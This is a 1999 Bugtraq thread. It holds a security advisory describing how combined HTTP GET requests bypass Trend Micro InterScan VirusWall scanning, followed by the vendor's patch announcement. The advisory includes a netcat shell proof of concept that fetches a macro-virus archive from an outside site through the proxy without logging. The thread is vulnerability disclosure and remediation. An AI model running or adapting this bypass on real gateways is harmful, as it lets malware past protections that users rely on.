Date: Mon, 22 Feb 1999 21:31:51 +0100 From: The Unicorn To: BUGTRAQ@netspace.org Subject: BlackHats Advisory -- InterScan VirusWall BlackHats Security Advisory Release date: February 22, 1999 Application: InterScan Viruswall for Solaris Severity: Any user can download binaries and virus infected files though the VirusWall Author(s): s10@blackhats.org, unicorn@blackhats.org --- Overview : --- InterScan VirusWall is part of Trend Micro's integrated family of virus protection products that covers every access point - Internet gateways, groupware, e-mail and intranet servers, LAN servers, and desktops. InterScan VirusWall scans inbound and outbound SMTP mail and attachments, FTP and HTTP traffic in real time. It automatically cleans infected files and detects malicious Java applets and ActiveX objects. When two HTML GET commands are combined in one request, of wich the former points to a non-scanned file like a graphic image (i.e. a GIF file) and the latter to a possibly infected binary or macro file, both of the files are passed to the user requesting the data without any warning or logging by the VirusWall. We found that this combination was sometimes generated by well-known web browsers like Netscape Communicator and Microsoft Internet Explorer during normal use. We informed Trend Micro of this vulnerability more than three weeks ago. We fully described the problem to Trend Engineering and included an exploit similar to the one described below and all traffic between the browser and VirusWall, but did not receive a fix for this problem. The explanation received was that they were unable to reproduce it on their systems. Since these systems are used to protect people behind (expensive) firewall configurations against virus infection, we decided to make, at least, the administrators of these systems aware of this exploit that can be used by users behind an InterScan VirusWall configuration to circumvent the implemented security policy. --- Affected systems: --- InterScan Viruswall for Solaris Implementations of InterScan VirusWall on other platforms are likely to be vulnerable, but are not tested since we do not have them available --- Workarounds/Fixes: --- We have not yet received a fix from Trend Micro. It might be possible to close this hole by scanning *ALL* data passed in HTTP traffic, but this will have a negative influence on the throughput of the complete firewall configuration. --- Example: --- We developed the following exploit that requests two files in one message. The first one is a simple graphic file (in this case form the Trend Micro web-site) and the second one is a file containing a well known macro-virus, which would normally be detected and removed by the product. Using the netcat tool we send this combined request out to the world using the VirusWall as a proxy-server. The information received back is stored in a file. When later examining the file we find both the graphic and the virus infected contents requested. Looking through the logfiles no trace is found of this file seeping through the hole. #!/bin/sh echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0 Referer: http://www.antivirus.com/index.html Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.5 [en] (WinNT; I) Host: www.antivirus.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0 Referer: http://sourceofkaos.com/homes/knowdeth/index.html Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.5 [en] (WinNT; I) Host: sourceofkaos.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 " | nc viruswall 80 > the.results Changing the second part of this "code" will enable downloading any information through the Trend Micro InterScan VirusWall. Probably because the product only acts on the first GET command in a message, while retrieving all information requested. --- Further Study: --- Further study of this vulnerability may focus on FTP and SMTP traffic and the detection of malicious Java applets and ActiveX objects. Ciao, Unicorn. -- ======= _ __,;;;/ TimeWaster ================================================ ,;( )_, )~\| A Truly Wise Man Never Plays ;; // `--; Leapfrog With A Unicorn... ==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! ======= ---------------------------------------------------------------------------------- Date: Thu, 25 Feb 1999 12:28:46 -0800 From: Bob Li To: BUGTRAQ@netspace.org Subject: Patch for InterScan VirusWall for Unix now available We have been recently notified about a potential security hole in our InterScan Web VirusWall for Solaris product via the "BlackHats Security Advisory". The potential problem described relates to being able to download binaries and virus infected files by using HTTP proxy "keep-alive" connections. We have looked into the description of the problem and have identified that there was a problem with the software. As a result, we are issuing a patch which can be obtained from Trend Micro at http:://www.antivirus.com to resolve the problem. This issue applies to InterScan for Solaris and HP-UX. The Windows NT version of InterScan does not have this problem. Bob Li Product Manager Trend Micro, Inc. E-Mail: bob_li@trendmicro.com Phone: 408-863-6341